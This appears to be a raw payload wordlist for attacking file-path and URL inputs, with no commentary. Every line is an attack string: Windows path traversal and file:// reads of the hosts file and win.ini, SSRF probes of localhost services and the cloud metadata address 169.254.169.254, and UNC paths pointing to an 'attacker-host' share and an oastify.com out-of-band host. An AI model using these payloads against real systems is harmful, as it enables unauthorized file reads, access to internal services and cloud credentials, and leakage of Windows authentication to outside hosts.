C:\\Windows\\System32\\drivers\\etc\\hosts
\\\\attacker-host\\share\\maliciousfile
\\\\\\\\127.0.0.1\\\\c$\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts
file:///C:/Windows/System32/drivers/etc/hosts
http://127.0.0.1:9200/_cat
\\\\udbj3hhl7qryyc3fqxpc97bptgz7nxbm.oastify.com\\foo
C:\\Windows\\System32\\drivers\\etc\\hosts
http://127.0.0.1:80
http://169.254.169.254/latest/meta-data/
..\\..\\..\\..\\Windows\\win.ini
../../../../Windows/win.ini
file:\\\\C:\\Windows\\System32\\drivers\\etc\\hosts
file:\\\\C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts
\\\\udbj3hhl7qryyc3fqxpc97bptgz7nxbm.oastify.com\\test
\\\\\\\\udbj3hhl7qryyc3fqxpc97bptgz7nxbm.oastify.com\\\\test
\\\\udbj3hhl7qryyc3fqxpc97bptgz7nxbm.oastify.com\\share
\\\\\\\\udbj3hhl7qryyc3fqxpc97bptgz7nxbm.oastify.com\\\\share
file:///C:/Windows/System32/drivers/etc/hosts
http://127.0.0.1:8080/admin
..%5c..%5c..%5cWindows%5cwin.ini
C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts
..\\\\..\\\\..\\\\Windows\\\\win.ini
